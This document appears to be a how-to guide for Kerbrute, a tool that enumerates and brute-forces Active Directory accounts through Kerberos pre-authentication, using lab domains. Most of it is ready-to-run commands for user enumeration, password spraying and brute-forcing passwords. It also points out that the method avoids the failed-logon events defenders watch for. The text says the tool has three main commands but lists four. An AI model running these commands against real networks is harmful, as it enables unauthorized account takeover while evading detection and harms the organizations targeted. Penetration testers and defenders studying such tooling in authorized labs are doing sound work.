A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication


Kerbrute has three main commands:

  • bruteuser - Bruteforce a single user's password from a wordlist
  • bruteforce - Read username:password combos from a file or stdin and test them
  • passwordspray - Test a single password against a list of users
  • userenum - Enumerate valid domain usernames via Kerberos

A domain (-d) or a domain controller (--dc) must be specified. If a Domain Controller is not given the KDC will be looked up via DNS.

By brute-forcing Kerberos pre-authentication, you do not trigger the account failed to log on event which can throw up red flags to blue teams. When brute-forcing through Kerberos you can brute-force by only sending a single UDP frame to the KDC allowing you to enumerate the users on the domain from a wordlist.

Using Nmap do extract the information needed (Domain)

  • nmap -sC -A -T5 -Pn

How to run Kerbrute

1. Download the binary from github (https://github.com/ropnop/kerbrute/releases)

2. Change the binary permissions to add execution

  • chmod 777 kerbrute

3. Execute the binary with (-h) flag to get the help menu

  • ./kerbrute -h

4. Display the tool version

  • ./kerbrute version

How to use

1. Enumerate users, providing a user list, against the DC and the domain

  • ./kerbrute_linux_386 userenum --dc -d spookysec.local ../userlist.txt
  • ./kerbrute_linux_386 userenum --dc --domain spookysec.local ../userlist.txt

2. Password Spray

  • ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123

3. Brute User

  • ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman

4. Brute Force

  • cat combos.lst | ./kerbrute -d lab.ropnop.com bruteforce -

Note: (format username:password)


1. Modify the number of threads used by the tool

  • ./kerbrute userenum --dc --domain spookysec.local ../userlist.txt -t 50

2. Output is logged to stdout, but a log file can be specified with -o.

  • ./kerbrute userenum --domain spookysec.local ../userlist.txt -o outfile.txt

3. By default, failures are not logged, but that can be changed with -v (verbose)

  • ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman -v

4. Lastly, Kerbrute has a --safe option. When this option is enabled, if an account comes back as locked out, it will abort all threads to stop locking out any other accounts

  • ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman --safe